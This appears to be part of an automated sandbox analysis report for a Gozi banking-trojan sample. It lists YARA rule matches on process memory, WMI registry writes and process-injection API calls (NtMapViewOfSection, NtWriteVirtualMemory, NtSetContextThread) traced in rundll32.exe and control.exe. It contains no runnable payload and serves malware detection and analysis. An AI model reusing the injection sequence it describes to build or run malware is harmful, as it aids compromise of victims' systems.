Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: 7078612.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D7596 3_2_050D7596
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D826C 3_2_050D826C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3EEB 3_2_050D3EEB
Source: C:\Windows\System32\control.exe Code function: 24_2_00E49870 24_2_00E49870
Source: C:\Windows\System32\control.exe Code function: 24_2_00E42990 24_2_00E42990
Source: C:\Windows\System32\control.exe Code function: 24_2_00E64900 24_2_00E64900
Source: C:\Windows\System32\control.exe Code function: 24_2_00E688EC 24_2_00E688EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E53880 24_2_00E53880
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4B85C 24_2_00E4B85C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E621EC 24_2_00E621EC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5F9DC 24_2_00E5F9DC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5C148 24_2_00E5C148
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4F954 24_2_00E4F954
Source: C:\Windows\System32\control.exe Code function: 24_2_00E69120 24_2_00E69120
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5B12C 24_2_00E5B12C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E412DC 24_2_00E412DC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E69254 24_2_00E69254
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4BA38 24_2_00E4BA38
Source: C:\Windows\System32\control.exe Code function: 24_2_00E59BA8 24_2_00E59BA8
Source: C:\Windows\System32\control.exe Code function: 24_2_00E66B84 24_2_00E66B84
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6A38C 24_2_00E6A38C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E47B90 24_2_00E47B90
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6BB34 24_2_00E6BB34
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6630C 24_2_00E6630C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E56B08 24_2_00E56B08
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46310 24_2_00E46310
Source: C:\Windows\System32\control.exe Code function: 24_2_00E43CE0 24_2_00E43CE0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6ACF4 24_2_00E6ACF4
Source: C:\Windows\System32\control.exe Code function: 24_2_00E504D0 24_2_00E504D0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46CB8 24_2_00E46CB8
Source: C:\Windows\System32\control.exe Code function: 24_2_00E61C90 24_2_00E61C90
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5FC40 24_2_00E5FC40
Source: C:\Windows\System32\control.exe Code function: 24_2_00E44438 24_2_00E44438
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4DD20 24_2_00E4DD20
Source: C:\Windows\System32\control.exe Code function: 24_2_00E48E70 24_2_00E48E70
Source: C:\Windows\System32\control.exe Code function: 24_2_00E61620 24_2_00E61620
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5CE00 24_2_00E5CE00
Source: C:\Windows\System32\control.exe Code function: 24_2_00E437F0 24_2_00E437F0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4FF68 24_2_00E4FF68
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4CF74 24_2_00E4CF74
Source: C:\Windows\System32\control.exe Code function: 24_2_00E6BF00 24_2_00E6BF00
Source: C:\Windows\System32\control.exe Code function: 24_2_00E59F0C 24_2_00E59F0C
Source: C:\Windows\System32\control.exe Code function: 24_2_00E5271C 24_2_00E5271C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3925 NtMapViewOfSection, 3_2_050D3925
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D625A GetProcAddress,NtCreateSection,memset, 3_2_050D625A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D60CC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_050D60CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D8491 NtQueryVirtualMemory, 3_2_050D8491
Source: C:\Windows\System32\control.exe Code function: 24_2_00E49870 NtSetContextThread,NtUnmapViewOfSection,NtClose, 24_2_00E49870
Source: C:\Windows\System32\control.exe Code function: 24_2_00E46034 NtAllocateVirtualMemory, 24_2_00E46034
Source: C:\Windows\System32\control.exe Code function: 24_2_00E55010 NtWriteVirtualMemory, 24_2_00E55010
Source: C:\Windows\System32\control.exe Code function: 24_2_00E4C108 NtQueryInformationToken,NtQueryInformationToken,NtClose, 24_2_00E4C108
Source: C:\Windows\System32\control.exe Code function: 24_2_00E67AAC NtMapViewOfSection, 24_2_00E67AAC
Source: C:\Windows\System32\control.exe Code function: 24_2_00E44BE0 NtSetInformationProcess,ResumeThread,FindCloseChangeNotification, 24_2_00E44BE0
Source: C:\Windows\System32\control.exe Code function: 24_2_00E62300 NtQueryInformationProcess, 24_2_00E62300
Source: C:\Windows\System32\control.exe Code function: 24_2_00E56DA4 NtCreateSection, 24_2_00E56DA4
Source: C:\Windows\System32\control.exe Code function: 24_2_00E41D94 NtReadVirtualMemory, 24_2_00E41D94
Source: C:\Windows\System32\control.exe Code function: 24_2_00E45710 NtQueryInformationProcess, 24_2_00E45710
Source: C:\Windows\System32\control.exe Code function: 24_2_00E7C029 NtProtectVirtualMemory,NtProtectVirtualMemory, 24_2_00E7C029
